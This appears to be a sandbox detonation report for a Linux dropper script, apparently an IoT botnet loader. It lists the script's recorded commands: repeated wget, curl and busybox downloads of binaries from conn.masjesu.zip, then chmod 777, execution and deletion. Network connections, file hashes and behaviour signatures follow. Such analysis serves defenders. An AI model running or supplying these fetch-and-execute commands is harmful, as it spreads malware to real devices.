[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
FR 37.44.238.68:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.121.86.228:80 conn.masjesu.zip tcp

Files

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral5

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:52

Platform

debian9-mipsel-20240729-en

Max time kernel

69s

Max time network

70s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
